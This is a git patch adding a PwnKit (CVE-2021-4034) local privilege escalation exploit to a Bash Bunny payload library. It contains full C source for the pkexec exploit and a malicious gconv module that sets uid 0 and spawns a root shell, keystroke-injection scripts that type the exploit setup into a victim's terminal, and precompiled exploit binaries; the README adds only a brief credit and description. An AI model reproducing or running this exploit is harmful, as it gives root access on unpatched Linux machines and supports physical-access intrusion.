From c06fd4aa807a14b1a68b0dfaf1ecb089c5da6685 Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Sat, 29 Jan 2022 12:26:56 -0500
Subject: [PATCH] Add "PwnKit Vulnerability" - LPE (#489)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* Add "PwnKit Vulnerability" - LPE

The Qualys Research Team has discovered a memory corruption
vulnerability in polkit’s pkexec, a SUID-root program that
is installed by default on every major Linux distribution.

* Add Credits to README.MD

* pwnkit: Move to shorter directory name

* pwnkit: Add compiled version

* pwnkit: Copy built binaries instead of compiling

* make it executable

* add credits

Co-authored-by: Marc <foxtrot@malloc.me>
---
 .../PwnKit_LPE/CVE-2021-4034_files/exploit.c  |  21 ++++
 .../PwnKit_LPE/CVE-2021-4034_files/library.c  |  24 ++++
 .../library/execution/PwnKit_LPE/README.md    |  26 ++++
 .../library/execution/PwnKit_LPE/payload.txt  | 112 +++++++++++++++++
 .../CVE-2021-4034_files/exploit.c             |  21 ++++
 .../CVE-2021-4034_files/library.c             |  24 ++++
 .../CVE-2021-4034_files/pwnkit                | Bin 0 -> 16144 bytes
 .../CVE-2021-4034_files/pwnkit.so             | Bin 0 -> 15592 bytes
 .../execution/PwnKit_LPE_Compiled/README.md   |  28 +++++
 .../execution/PwnKit_LPE_Compiled/payload.txt | 116 ++++++++++++++++++
 10 files changed, 372 insertions(+)
 create mode 100644 payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c
 create mode 100644 payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c
 create mode 100644 payloads/library/execution/PwnKit_LPE/README.md
 create mode 100644 payloads/library/execution/PwnKit_LPE/payload.txt
 create mode 100644 payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c
 create mode 100644 payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c
 create mode 100755 payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit
 create mode 100755 payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit.so
 create mode 100644 payloads/library/execution/PwnKit_LPE_Compiled/README.md
 create mode 100644 payloads/library/execution/PwnKit_LPE_Compiled/payload.txt

diff --git a/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c b/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c
new file mode 100644
index 00000000..7df10400
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c
@@ -0,0 +1,21 @@
+#include <unistd.h>
+
+int main() {
+
+    char * const ARGUMENTS[] = {
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "pwnkit.so:.",
+        "PATH=GCONV_PATH=.",
+        "SHELL=PWNKIT",
+        "CHARSET=PWNKIT",
+        NULL
+    };
+
+    execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
+
+    return(0);
+
+}
\ No newline at end of file
diff --git a/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c b/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c
new file mode 100644
index 00000000..4dadea26
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void gconv() {}
+
+void gconv_init() {
+
+    char * const ARGUMENTS[] = {
+        "/bin/sh",
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
+        NULL
+    };
+
+    setuid(0);
+    setgid(0);
+    execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
+    exit(0);
+
+}
\ No newline at end of file
diff --git a/payloads/library/execution/PwnKit_LPE/README.md b/payloads/library/execution/PwnKit_LPE/README.md
new file mode 100644
index 00000000..f6649bf9
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE/README.md
@@ -0,0 +1,26 @@
+# PwnKit Vulnerability - Local Privilege Escalation
+
+- Title:         PwnKit Vulnerability - Local Privilege Escalation
+- Author:        TW-D
+- Version:       1.0
+- Target:        Linux
+- Category:      Execution
+- Credits:       Qualys Research Team   
+
+## Description
+
+The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
+
+[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+
+```
diff --git a/payloads/library/execution/PwnKit_LPE/payload.txt b/payloads/library/execution/PwnKit_LPE/payload.txt
new file mode 100644
index 00000000..fc5db15a
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE/payload.txt
@@ -0,0 +1,112 @@
+#!/bin/bash
+#
+# Title:            PwnKit Vulnerability - Local Privilege Escalation
+#
+# Description:      
+#                   The Qualys Research Team has discovered a memory corruption 
+#                   vulnerability in polkit’s pkexec, a SUID-root program that 
+#                   is installed by default on every major Linux distribution.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Execution
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.3 LTS x86_64
+# pkexec version 0.105
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+RUN UNITY xterm
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
+Q ENTER
+Q DELAY 3500
+
+Q STRING "mkdir /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING "cd /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "/usr/bin/pkexec --version"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "id"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0
\ No newline at end of file
diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c
new file mode 100644
index 00000000..7df10400
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c
@@ -0,0 +1,21 @@
+#include <unistd.h>
+
+int main() {
+
+    char * const ARGUMENTS[] = {
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "pwnkit.so:.",
+        "PATH=GCONV_PATH=.",
+        "SHELL=PWNKIT",
+        "CHARSET=PWNKIT",
+        NULL
+    };
+
+    execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
+
+    return(0);
+
+}
\ No newline at end of file
diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c
new file mode 100644
index 00000000..4dadea26
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void gconv() {}
+
+void gconv_init() {
+
+    char * const ARGUMENTS[] = {
+        "/bin/sh",
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
+        NULL
+    };
+
+    setuid(0);
+    setgid(0);
+    execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
+    exit(0);
+
+}
\ No newline at end of file
diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit
new file mode 100755
index 0000000000000000000000000000000000000000..787f73d8eb0a2eee48383070e077774166e4442b
GIT binary patch
literal 16144
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
LknVB_97XYOwH|bk

literal 0
HcmV?d00001

diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit.so b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit.so
new file mode 100755
index 0000000000000000000000000000000000000000..2254beeb23004979438655c3543e82f1a7e308fc
GIT binary patch
literal 15592
zcmeHOYit}>6~4Q1TDP@hw<M{XRAd?w;i7cyG)-_HZr0CCik%q8t|+LQu6M`wqJ3Di
zv#DKv)F@CjSdj_{Dt@#)B-H%rLn?njLO2+uDniI0A+-o0^QdG?6}UVDKfIiC@A=lV
zlidn|#2@BLJLjD5yzZQt_1y8E`}EMra6A@M7(3L%ilw=BgCs?<eq0zLN!6onq2rxu
zzqW1KR$a$6-(Vn6C2={&PF9H=rdMQ2pwKg{^I7an!_vnpT@?{D=*LrOPZ)#thihqf
z+{isb;m0ETS>k7jALz2o6SUcc(R1W^UY2-a+AVgVVZXP;FH8@KAE>ScVdviQGyh4x
zG4VTMnZRL+JfO(;aq^Q(D>Hh3(k|+8$=B#QY)U;rMb!1QC<fm%r_M~On2Ig)T%eDO
zOpqR|+fAPx^kMt)$9g~Xy-%uzk+XN))wB2J@~a;{dmkHenQx*G$C2}CZ&C*}b~9n=
zmZ#f}zcju`Y~8`<W!2I6gxyvL=R8&&JWp6X`_DAMj}UIrCp@MJs269L@PlDvk|(u&
zi@N_-qr6dUJ|%cka8GdMI5YWT!72GE&vzW<oSqnUGOp*&WJ|v5O^goYiUoHfHI;LX
zuD-@e&!?Q}Y$27)KIN*Jbg^*W9Gz?->#LIMm$MlrGeq2ZH+|kELYiE5DxD}56DQQE
zk<<MH&b^6y6Xs77U&*+>o_wVHL(iD$B5}C?%KNf(x#Q{!T1&WmpYi?cmh<fh;cF70
zCutmE4|(mR!TBCCnT@<2!1-Rp*bLxu-)Ysg0FE52=tyd{;_D-S8Z=-9aC|pe(HX$?
z-&qD}bSE{@ad52-5*?!oL=}iC5LF<mKvaRK0#OD2A1d(Ywh#W(zVL3dy|nY~E~V_x
zFZ=Pzs(s-{%`5u!E60CJaOLpt>DYE4NgT_wtlL<t&^Y`{mU+p$v8v^tv&>7>jb$zW
zm}Or2ZoEdaeW~|N0_;mWf5_ziYyKWe{V4O4`liZS+kr*0RVzZt{%hL)_?MX6y=7nA
zw6FZ(q<!Vu4m)<${@Iqln*tn`0L_)P>9zxd+x~ohi@lSiR^?-p_J!U!v-ZVz{8oFZ
z_XG)*J)87yzn-SaUEO(vfY{?J(}}hNpW|t$mFaDs&!6LM%#iIQ#dz-V6(&@_?u@<E
zbhuN89=djPna=N9yExC#s{O{$TO5g?=MA(*&^kju;KTacTa}98UM0?6B9}{(Yxbql
zRr}&k?Tc@$KU+0;kvOI2ps!i=Dsh}>L=}iC5LF<mKvaRK0#OB`3Pcr%DiBp5sz6kM
z#uezA$`-mxvudnw!tQ0^fv%E1mP?)ynPI3)#rE%b(4tWMGXIx9Rw@q>ZGEp&$q?O5
zl;4>7H&-69r^Z!mzCE_T<;Ldc=)VJp2)mO$uaVyv8|-Qy-qrC)+bvHvFRGLK9{k9$
zLkAgVn?d?~bF)&>zfbk;YJVm^(0W5Z1tPqIKAi7a((B(Op(iXFQ3aw3L=}iC5LF<m
zKvaRK0#OB`3Pcr%D)8@D0R4~XcSJAaqJ(HcDCvi675O{TH+hH1=&Rf>GQYd=*k_1B
ze<i=~@qqrXTa}^)q*)TZi``8cMUSrP6g~Io^7yJD)R%4szbEn#Go_MRtoBYmVZ`eD
zDtaMr7yPm$25y?wx953T?6`NB2lCMmw0iz)GGF?oSj(s*y|!xks_6eAa&?|2-2d!|
zKK5|J6LNirg+3~DS}6KnPYnz_V0BW5_1)Idqlu%5?r@-x%yno|@6oT=wS(`gxN52H
zJAjscG1vGvBrov01jl^}{G-Ig)a@#nGzjWGpz+(P_npxy^=V=_FYbHb=e7N<)&5}M
zUm>R6{2QIu*L9qB^%DybwrRaMFOxd1S{1%euzsDGnA)pQci_t!|9}c#$2YY>n>u1?
zrh51laU2Krfnr_bdlbGWz+a~mi!1t;h3daW1{RD0bRXH*>p#DT@Ot(SY5VK@&-)w1
znQVYh6J9U=Vgvgx6Mir-Z?Lau`xbRw-+S8gOMaQULDFiw-QDr?PMRCuOVk&iDLON`
z;#4Z<Wc;F6a#H1al`iJza<1=Y=!;R;f}7y8PRjFA3yxdxy#+PxrSh(mDd+PG<Pwl{
zYkZ9<HN$%;Z-J)dIK$(8qeITnnL%#K=b)UgRCH!jg$(!N4?cFLZ}jv4q4Z^ShHP=L
z2geDbwtcvs8adnFH{zTf9zHiT;Y{@Pj|{zkm%r)GPX^oZLwf{Fd%tPsud(Bf{u)5<
zCaAk(!0ZU9HLlr2P@~cr%~k@HC@tju)D%(QGjtYQq3FAbnL;@+=N0E%&tFi9Dl}Ej
z<}&xt?gMQwo1*`bCNc{J3TCM98O?duD`ks?8o?o*=jKxEAlzKeR|&nhA>q68#Oq6x
z@QRs~pHc~TR<87HhI}Cz4|B<l2Y3pc%4gG*wMen(kkAQCu&Gi>CFst}(+!3D`oE?8
z9Oq|YTmm)P&xAa9o<pV<s~Z1C`<h@ck4K2AkGQ|lvl98M4|aKQc8VqZ!udZ&dR`mA
zAL|FuX8PXq;Kx3*@W*rg9ATUa{#cKIV*NoTdPq2kiucp-S^)ld{)6rnOUxg3ptGds
zwFP9XFF-Bv56@p<^&~MI8~#|&fL<0u<PV?!XT`r??65upeInpbPm$~Dw?r7%q`KDy
z&l90oCrTJSSMW@qp-<4?5<k$fpfT~G@al^pf9!7r<>yUsz#rK2#02x>`3#D6FziuB
z$S;V0wf>f9gz|o_;6VL>eVZ804}Uz@K@Y)DXgI%FKWzJtS;i1_QT#x{`M*yJUW;L!
ziuFDA@rCUngYtT$E#Qy!e+U0zpaDB0ZOg!aK?=TikRR(E?8{u1>nF?hYCK%WUz0DJ
zz#sdy*18C!Vd>-c0eL}xN2;K|N{Vf_p*<pkzz_6YQUv|6j_VPB*oFNe|A`p3!Tgg+
zqe(XK=Ul<@cM=#A^QsE|;WZolgB15()tQ)2NWfK5^7|eC28i>)-%ox|!rY0ij?QC-
X{Vo!TCL}6;y{zZ|oBQfJg#G^o^{lU8

literal 0
HcmV?d00001

diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/README.md b/payloads/library/execution/PwnKit_LPE_Compiled/README.md
new file mode 100644
index 00000000..87f948c5
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE_Compiled/README.md
@@ -0,0 +1,28 @@
+# PwnKit Vulnerability - Local Privilege Escalation - Compiled
+
+- Title:         PwnKit Vulnerability - Local Privilege Escalation
+- Author:        TW-D
+- Version:       1.0
+- Target:        Linux
+- Category:      Execution
+- Credits:       Qualys Research Team     
+
+## Description
+
+This is a version of the PwnKit Vulnerability Local Privilege Escalation containing pre-compiled binaries for x86_64 Linux. If you don't want to use the pre-compiled binaries or you are targetting a different architecture, please find the `PwnKit-LPE` directory.
+
+The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
+
+[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+
+```
diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/payload.txt b/payloads/library/execution/PwnKit_LPE_Compiled/payload.txt
new file mode 100644
index 00000000..fec96d9c
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE_Compiled/payload.txt
@@ -0,0 +1,116 @@
+#!/bin/bash
+#
+# Title:            PwnKit Vulnerability - Local Privilege Escalation
+#
+# Description:      
+#                   The Qualys Research Team has discovered a memory corruption 
+#                   vulnerability in polkit’s pkexec, a SUID-root program that 
+#                   is installed by default on every major Linux distribution.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Execution
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.3 LTS x86_64
+# pkexec version 0.105
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+RUN UNITY xterm
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
+Q ENTER
+Q DELAY 3500
+
+Q STRING "mkdir /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp pwnkit.so /tmp/pwnkit_lpe/pwnkit.so"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp pwnkit /tmp/pwnkit_lpe/pwnkit"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING "cd /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "/usr/bin/pkexec --version"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "chmod +x ./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "id"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0